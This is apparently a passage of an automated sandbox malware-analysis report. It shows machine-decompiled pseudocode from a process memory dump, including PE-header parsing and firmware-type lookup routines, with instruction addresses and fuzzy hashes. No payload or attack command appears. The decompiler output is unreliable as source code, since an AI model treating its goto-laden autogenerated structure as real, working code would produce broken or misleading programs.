													goto L46;
												} else {
													asm("int 0x29");
													_t356 = 0;
													_v44 = 0;
													_t290 = _v52;
													__eflags = 0;
													if(0 == 0) {
														L108:
														_t356 = 0;
														_v44 = 0;
														goto L63;
													} else {
														__eflags = 0;
														if(0 < 0) {
															goto L108;
														}
														L63:
														_v112 = _t356;
														__eflags = _t356;
														if(_t356 == 0) {
															L143:
															_v8 = 0xfffffffe;
															_t211 = 0xc0000089;
														} else {
															_v36 = 0;
															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E009CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L009CEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L009F9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E009CE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L009C8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E009F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                                    0x009cd5f2
                                                                                    0x009cd5f5
                                                                                    0x009cd5f5
                                                                                    0x009cd5fd
                                                                                    0x009cd600
                                                                                    0x009cd60a
                                                                                    0x009cd60d
                                                                                    0x009cd617
                                                                                    0x009cd61d
                                                                                    0x009cd627
                                                                                    0x009cd62e
                                                                                    0x009cd911
                                                                                    0x009cd913
                                                                                    0x00000000
                                                                                    0x009cd919
                                                                                    0x009cd919
                                                                                    0x009cd919
                                                                                    0x009cd634
                                                                                    0x009cd634
                                                                                    0x009cd634
                                                                                    0x009cd634
                                                                                    0x009cd640
                                                                                    0x009cd8bf
                                                                                    0x00000000
                                                                                    0x009cd646
                                                                                    0x009cd646
                                                                                    0x009cd64d
                                                                                    0x009cd652
                                                                                    0x00a1b2fc
                                                                                    0x00a1b2fc
                                                                                    0x00a1b302
                                                                                    0x00a1b33b
                                                                                    0x00a1b341
                                                                                    0x00000000
                                                                                    0x00a1b304
                                                                                    0x00a1b304
                                                                                    0x00a1b319
                                                                                    0x00a1b31e
                                                                                    0x00a1b324
                                                                                    0x00a1b326
                                                                                    0x00a1b332
                                                                                    0x00a1b347
                                                                                    0x00a1b34c
                                                                                    0x00a1b351
                                                                                    0x00a1b35a
                                                                                    0x00000000
                                                                                    0x00a1b328
                                                                                    0x00a1b328
                                                                                    0x00000000
                                                                                    0x00a1b328
                                                                                    0x00a1b326
                                                                                    0x009cd658
                                                                                    0x009cd658
                                                                                    0x009cd65b
                                                                                    0x009cd665
                                                                                    0x00000000
                                                                                    0x009cd66b
                                                                                    0x009cd66b
                                                                                    0x009cd66b
                                                                                    0x009cd66b
                                                                                    0x009cd66d
                                                                                    0x009cd672
                                                                                    0x009cd67a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cd680
                                                                                    0x009cd686
                                                                                    0x009cd8ce
                                                                                    0x009cd8d4
                                                                                    0x009cd8dd
                                                                                    0x009cd8e0
                                                                                    0x009cd68c
                                                                                    0x009cd691
                                                                                    0x009cd69d
                                                                                    0x009cd6a2
                                                                                    0x009cd6a7
                                                                                    0x009cd6b0
                                                                                    0x009cd6b5
                                                                                    0x009cd6e0
                                                                                    0x009cd6b7
                                                                                    0x009cd6b7
                                                                                    0x009cd6b9
                                                                                    0x009cd6b9
                                                                                    0x009cd6bb
                                                                                    0x009cd6bd
                                                                                    0x009cd6ce
                                                                                    0x009cd6d0
                                                                                    0x009cd6d2
                                                                                    0x00a1b363
                                                                                    0x00a1b365
                                                                                    0x00000000
                                                                                    0x00a1b36b
                                                                                    0x00000000
                                                                                    0x00a1b36b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cd6bf
                                                                                    0x009cd6bf
                                                                                    0x009cd6e5
                                                                                    0x009cd6e7
                                                                                    0x009cd6e9
                                                                                    0x009cd6ec
                                                                                    0x009cd6ec
                                                                                    0x009cd6ef
                                                                                    0x009cd6f5
                                                                                    0x009cd6f9
                                                                                    0x009cd6fb
                                                                                    0x009cd6fd
                                                                                    0x009cd701
                                                                                    0x009cd703
                                                                                    0x009cd70a
                                                                                    0x009cd70a
                                                                                    0x009cd701
                                                                                    0x009cd710
                                                                                    0x009cd710
                                                                                    0x009cd6c1
                                                                                    0x009cd6c1
                                                                                    0x009cd6c6
                                                                                    0x00a1b36d
                                                                                    0x00a1b36f
                                                                                    0x00000000
                                                                                    0x00a1b375
                                                                                    0x00a1b375
                                                                                    0x00a1b375
                                                                                    0x00000000
                                                                                    0x00a1b375
                                                                                    0x00000000
                                                                                    0x009cd6cc
                                                                                    0x009cd6d8
                                                                                    0x009cd6d8
                                                                                    0x009cd6d8
                                                                                    0x00000000
                                                                                    0x009cd6c6
                                                                                    0x009cd6bf
                                                                                    0x00000000
                                                                                    0x009cd6da
                                                                                    0x009cd6da
                                                                                    0x009cd716
                                                                                    0x009cd71b
                                                                                    0x009cd720
                                                                                    0x009cd726
                                                                                    0x009cd726
                                                                                    0x009cd72d
                                                                                    0x00000000
                                                                                    0x009cd733
                                                                                    0x009cd739
                                                                                    0x009cd742
                                                                                    0x009cd750
                                                                                    0x009cd758
                                                                                    0x009cd764
                                                                                    0x009cd776
                                                                                    0x009cd77a
                                                                                    0x009cd783
                                                                                    0x009cd928
                                                                                    0x009cd92c
                                                                                    0x009cd93d
                                                                                    0x009cd944
                                                                                    0x009cd94f
                                                                                    0x009cd954
                                                                                    0x009cd956
                                                                                    0x009cd95f
                                                                                    0x009cd961
                                                                                    0x009cd973
                                                                                    0x009cd973
                                                                                    0x009cd956
                                                                                    0x009cd944
                                                                                    0x009cd92c
                                                                                    0x009cd78b
                                                                                    0x00a1b394
                                                                                    0x009cd791
                                                                                    0x009cd798
                                                                                    0x00a1b3a3
                                                                                    0x00a1b3bb
                                                                                    0x00a1b3bb
                                                                                    0x009cd7a5
                                                                                    0x009cd866
                                                                                    0x009cd870
                                                                                    0x009cd892
                                                                                    0x009cd898
                                                                                    0x009cd89e
                                                                                    0x009cd8a0
                                                                                    0x009cd8a6
                                                                                    0x009cd8ac
                                                                                    0x009cd8ae
                                                                                    0x009cd8b4
                                                                                    0x009cd8b4
                                                                                    0x009cd8ae
                                                                                    0x009cd7a5
                                                                                    0x009cd78b
                                                                                    0x009cd7b1
                                                                                    0x00a1b3c5
                                                                                    0x00a1b3c5
                                                                                    0x009cd7c3
                                                                                    0x009cd7ca
                                                                                    0x009cd7e5
                                                                                    0x009cd7eb
                                                                                    0x009cd8eb
                                                                                    0x009cd8ed
                                                                                    0x00000000
                                                                                    0x009cd8f3
                                                                                    0x009cd8f3
                                                                                    0x009cd8f3
                                                                                    0x00000000
                                                                                    0x009cd8ed
                                                                                    0x009cd7cc
                                                                                    0x009cd7cc
                                                                                    0x009cd7d2
                                                                                    0x00000000
                                                                                    0x009cd7d4
                                                                                    0x009cd7d4
                                                                                    0x009cd7d7
                                                                                    0x009cd7df
                                                                                    0x00a1b3d4
                                                                                    0x00a1b3d9
                                                                                    0x00a1b3dc
                                                                                    0x00a1b3dc
                                                                                    0x00a1b3df
                                                                                    0x00a1b3e2
                                                                                    0x00a1b468
                                                                                    0x00a1b46d
                                                                                    0x00a1b46f
                                                                                    0x00a1b46f
                                                                                    0x00a1b475
                                                                                    0x009cd8f8
                                                                                    0x009cd8f9
                                                                                    0x009cd8fd
                                                                                    0x00a1b3e8
                                                                                    0x00a1b3e8
                                                                                    0x00a1b3eb
                                                                                    0x00a1b3ed
                                                                                    0x00000000
                                                                                    0x00a1b3ef
                                                                                    0x00a1b3ef
                                                                                    0x00a1b3f1
                                                                                    0x00a1b3f4
                                                                                    0x00a1b3fe
                                                                                    0x00a1b404
                                                                                    0x00a1b409
                                                                                    0x00a1b40e
                                                                                    0x00a1b410
                                                                                    0x00a1b410
                                                                                    0x00a1b414
                                                                                    0x00a1b414
                                                                                    0x00a1b41b
                                                                                    0x00a1b420
                                                                                    0x00a1b423
                                                                                    0x00a1b425
                                                                                    0x00a1b427
                                                                                    0x00a1b42a
                                                                                    0x00a1b42d
                                                                                    0x00a1b42d
                                                                                    0x00a1b42a
                                                                                    0x00a1b432
                                                                                    0x00a1b436
                                                                                    0x00a1b438
                                                                                    0x00a1b43b
                                                                                    0x00a1b43b
                                                                                    0x00a1b449
                                                                                    0x00a1b44e
                                                                                    0x00a1b454
                                                                                    0x00a1b458
                                                                                    0x00a1b458
                                                                                    0x00a1b45d
                                                                                    0x00000000
                                                                                    0x00a1b45d
                                                                                    0x00a1b3ed
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cd7df
                                                                                    0x009cd7d2
                                                                                    0x009cd7ca
                                                                                    0x00a1b37c
                                                                                    0x00a1b37e
                                                                                    0x00a1b385
                                                                                    0x00a1b38a
                                                                                    0x00000000
                                                                                    0x00a1b38a
                                                                                    0x009cd742
                                                                                    0x009cd7f1
                                                                                    0x009cd7f8
                                                                                    0x00a1b49b
                                                                                    0x00a1b49b
                                                                                    0x009cd800
                                                                                    0x009cd837
                                                                                    0x009cd843
                                                                                    0x009cd845
                                                                                    0x009cd847
                                                                                    0x009cd84a
                                                                                    0x009cd84b
                                                                                    0x009cd84e
                                                                                    0x009cd857
                                                                                    0x009cd818
                                                                                    0x009cd824
                                                                                    0x009cd831
                                                                                    0x00a1b4a5
                                                                                    0x00a1b4ab
                                                                                    0x00a1b4b3
                                                                                    0x00a1b4b8
                                                                                    0x00a1b4bb
                                                                                    0x00000000
                                                                                    0x00a1b4c1
                                                                                    0x00a1b4c1
                                                                                    0x00a1b4c8
                                                                                    0x00000000
                                                                                    0x00a1b4ce
                                                                                    0x00a1b4d4
                                                                                    0x00a1b4e1
                                                                                    0x00a1b4e3
                                                                                    0x00a1b4e5
                                                                                    0x00000000
                                                                                    0x00a1b4eb
                                                                                    0x00a1b4f0
                                                                                    0x00a1b4f2
                                                                                    0x009cdac9
                                                                                    0x009cdacc
                                                                                    0x009cdacf
                                                                                    0x009cdad1
                                                                                    0x009cdd78
                                                                                    0x009cdd78
                                                                                    0x009cdcf2
                                                                                    0x00000000
                                                                                    0x009cdad7
                                                                                    0x009cdad9
                                                                                    0x009cdadb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cdae1
                                                                                    0x009cdae1
                                                                                    0x009cdae4
                                                                                    0x009cdae6
                                                                                    0x00a1b4f9
                                                                                    0x00a1b4f9
                                                                                    0x00a1b500
                                                                                    0x009cdaec
                                                                                    0x009cdaec
                                                                                    0x009cdaf5
                                                                                    0x009cdaf8
                                                                                    0x009cdafb
                                                                                    0x009cdb03
                                                                                    0x009cdb11
                                                                                    0x009cdb16
                                                                                    0x009cdb19
                                                                                    0x009cdb1b
                                                                                    0x00a1b52c
                                                                                    0x00a1b531
                                                                                    0x00a1b534
                                                                                    0x009cdb21
                                                                                    0x009cdb21
                                                                                    0x009cdb24
                                                                                    0x009cdcd9
                                                                                    0x009cdce2
                                                                                    0x009cdce5
                                                                                    0x009cdd6a
                                                                                    0x009cdd6d
                                                                                    0x00000000
                                                                                    0x009cdd73
                                                                                    0x00a1b51a
                                                                                    0x00a1b51c
                                                                                    0x00a1b51f
                                                                                    0x00a1b524
                                                                                    0x00000000
                                                                                    0x00a1b524
                                                                                    0x009cdce7
                                                                                    0x009cdce7
                                                                                    0x009cdce7
                                                                                    0x00000000
                                                                                    0x009cdce7
                                                                                    0x00000000
                                                                                    0x009cdb2a
                                                                                    0x009cdb2c
                                                                                    0x009cdb31
                                                                                    0x009cdb33
                                                                                    0x009cdb36
                                                                                    0x009cdb39
                                                                                    0x009cdb3b
                                                                                    0x009cdb66
                                                                                    0x009cdb66
                                                                                    0x009cdb3d
                                                                                    0x009cdb3d
                                                                                    0x009cdb3e
                                                                                    0x009cdb46
                                                                                    0x009cdb47
                                                                                    0x009cdb49
                                                                                    0x009cdb4c
                                                                                    0x009cdb53
                                                                                    0x009cdb55
                                                                                    0x009cdb58
                                                                                    0x009cdb5a
                                                                                    0x00a1b50a
                                                                                    0x00a1b50f
                                                                                    0x00a1b512
                                                                                    0x009cdb60
                                                                                    0x009cdb60
                                                                                    0x009cdb63
                                                                                    0x009cdb63
                                                                                    0x00000000
                                                                                    0x009cdb63
                                                                                    0x009cdb5a
                                                                                    0x009cdb3b
                                                                                    0x009cdb24
                                                                                    0x009cdb69
                                                                                    0x009cdb69
                                                                                    0x009cdb6c
                                                                                    0x009cdb6f
                                                                                    0x009cdb74
                                                                                    0x00a1b557
                                                                                    0x00a1b557
                                                                                    0x00a1b55e
                                                                                    0x009cdb7a
                                                                                    0x009cdb7c
                                                                                    0x009cdb7f
                                                                                    0x009cdb82
                                                                                    0x009cdb85
                                                                                    0x00000000
                                                                                    0x009cdb8b
                                                                                    0x009cdb8b
                                                                                    0x009cdb8d
                                                                                    0x009cdb9b
                                                                                    0x009cdb9b
                                                                                    0x009cdb9d
                                                                                    0x009cdba0
                                                                                    0x009cdba2
                                                                                    0x009cdba4
                                                                                    0x009cdba7
                                                                                    0x009cdba9
                                                                                    0x009cdbae
                                                                                    0x009cdbae
                                                                                    0x009cdbb1
                                                                                    0x009cdbb4
                                                                                    0x009cdbb4
                                                                                    0x009cdbb7
                                                                                    0x009cdbba
                                                                                    0x009cdcd2
                                                                                    0x009cdcd4
                                                                                    0x00000000
                                                                                    0x009cdbc0
                                                                                    0x009cdbc0
                                                                                    0x009cdbd2
                                                                                    0x009cdbd7
                                                                                    0x009cdbda
                                                                                    0x009cdbdd
                                                                                    0x009cdbdf
                                                                                    0x00000000
                                                                                    0x009cdbe5
                                                                                    0x009cdbe5
                                                                                    0x009cdbee
                                                                                    0x009cdbf1
                                                                                    0x00a1b541
                                                                                    0x00a1b544
                                                                                    0x00000000
                                                                                    0x00a1b546
                                                                                    0x00a1b546
                                                                                    0x00000000
                                                                                    0x00a1b546
                                                                                    0x009cdbf7
                                                                                    0x009cdbf7
                                                                                    0x009cdbfd
                                                                                    0x009cdbfd
                                                                                    0x009cdbff
                                                                                    0x009cdc0b
                                                                                    0x009cdc15
                                                                                    0x009cdc1b
                                                                                    0x009cdc1d
                                                                                    0x009cdc21
                                                                                    0x009cdc21
                                                                                    0x009cdc23
                                                                                    0x009cdc23
                                                                                    0x009cdc26
                                                                                    0x009cdc29
                                                                                    0x009cdc2b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cdc31
                                                                                    0x009cdc34
                                                                                    0x009cdc36
                                                                                    0x009cdcbf
                                                                                    0x009cdcbf
                                                                                    0x009cdcc2
                                                                                    0x00000000
                                                                                    0x009cdc3c
                                                                                    0x009cdc41
                                                                                    0x009cdc43
                                                                                    0x00000000
                                                                                    0x009cdc45
                                                                                    0x009cdc45
                                                                                    0x009cdc47
                                                                                    0x00000000
                                                                                    0x009cdc4d
                                                                                    0x009cdc4d
                                                                                    0x009cdc50
                                                                                    0x009cdc52
                                                                                    0x009cdc55
                                                                                    0x009cdcfa
                                                                                    0x009cdcfe
                                                                                    0x009cdd08
                                                                                    0x009cdd0a
                                                                                    0x009cdd0c
                                                                                    0x00000000
                                                                                    0x009cdd12
                                                                                    0x009cdd15
                                                                                    0x009cdd2d
                                                                                    0x009cdd2f
                                                                                    0x009cdd32
                                                                                    0x009cdd35
                                                                                    0x00000000
                                                                                    0x009cdd35
                                                                                    0x009cdc5b
                                                                                    0x009cdc5b
                                                                                    0x009cdc5e
                                                                                    0x009cdc61
                                                                                    0x009cdc64
                                                                                    0x009cdc67
                                                                                    0x009cdc67
                                                                                    0x009cdc6a
                                                                                    0x009cdc6c
                                                                                    0x009cdc8e
                                                                                    0x009cdc8e
                                                                                    0x009cdc91
                                                                                    0x009cdc93
                                                                                    0x009cdcce
                                                                                    0x009cdcce
                                                                                    0x009cdc95
                                                                                    0x009cdc9c
                                                                                    0x009cdc6e
                                                                                    0x009cdc72
                                                                                    0x009cdc75
                                                                                    0x009cdc77
                                                                                    0x009cdc79
                                                                                    0x00a1b551
                                                                                    0x00a1b551
                                                                                    0x00000000
                                                                                    0x009cdc7f
                                                                                    0x009cdc7f
                                                                                    0x009cdc81
                                                                                    0x00000000
                                                                                    0x009cdc83
                                                                                    0x009cdc86
                                                                                    0x009cdc88
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cdc88
                                                                                    0x009cdc81
                                                                                    0x009cdc79
                                                                                    0x009cdc6c
                                                                                    0x009cdc55
                                                                                    0x009cdc47
                                                                                    0x009cdc43
                                                                                    0x00000000
                                                                                    0x009cdc36
                                                                                    0x009cdc23
                                                                                    0x00000000
                                                                                    0x009cdbff
                                                                                    0x009cdbf1
                                                                                    0x009cdbdf
                                                                                    0x009cdb8f
                                                                                    0x009cdb92
                                                                                    0x009cdb95
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cdb95
                                                                                    0x009cdb8d
                                                                                    0x009cdb85
                                                                                    0x009cdb74
                                                                                    0x009cdc9f
                                                                                    0x009cdca2
                                                                                    0x009cdcb0
                                                                                    0x009cdcb0
                                                                                    0x009cdad1
                                                                                    0x00a1b4e5
                                                                                    0x00a1b4c8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x009cd831
                                                                                    0x00000000
                                                                                    0x009cd800
                                                                                    0x00a1b47f
                                                                                    0x00a1b485
                                                                                    0x00000000
                                                                                    0x00a1b485
                                                                                    0x009cd665
                                                                                    0x009cd652
                                                                                    0x00000000

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.314955752.0000000000990000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: P/I$`*I
                                                                                    • API String ID: 0-441220423
                                                                                    • Opcode ID: 81794b5c8c258294f63aa67499c6291f8950884164893d66eba7da420a3ea321
                                                                                    • Instruction ID: 253e1fb18f2279d8f829eee7187a6b92156110d40a289749e5bbb5a04755ccba
                                                                                    • Opcode Fuzzy Hash: 81794b5c8c258294f63aa67499c6291f8950884164893d66eba7da420a3ea321
                                                                                    • Instruction Fuzzy Hash: 0EE1B070E0235ACFDB24DF24C984FA9B7B6BF85304F1441ADE9099B291D734AD85CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00A351BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 77%
                                                                                    			E00A351BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0xa905f0);
				E00A0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E009CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E00A353CA(0);
						return E00A0D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E009FF3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E009D3690(1, _t117, 0x991810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E009FAA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L009D4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E009FAA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E00A3500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E009F9860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}






















                                                                                    0x00a351be
                                                                                    0x00a351c3
                                                                                    0x00a351c8
                                                                                    0x00a351cd
                                                                                    0x00a351d0
                                                                                    0x00a351d3
                                                                                    0x00a351d8
                                                                                    0x00a351db
                                                                                    0x00a351de
                                                                                    0x00a351e0
                                                                                    0x00a351e3
                                                                                    0x00a351e6
                                                                                    0x00a351e8
                                                                                    0x00a35342
                                                                                    0x00a35351
                                                                                    0x00a35356
                                                                                    0x00a3535a
                                                                                    0x00a35360
                                                                                    0x00a35363
                                                                                    0x00a35366
                                                                                    0x00a35369
                                                                                    0x00a35369
                                                                                    0x00a3536b
                                                                                    0x00a3536b
                                                                                    0x00a35370
                                                                                    0x00a353a3
                                                                                    0x00a353a4
                                                                                    0x00a353a6
                                                                                    0x00a353ab
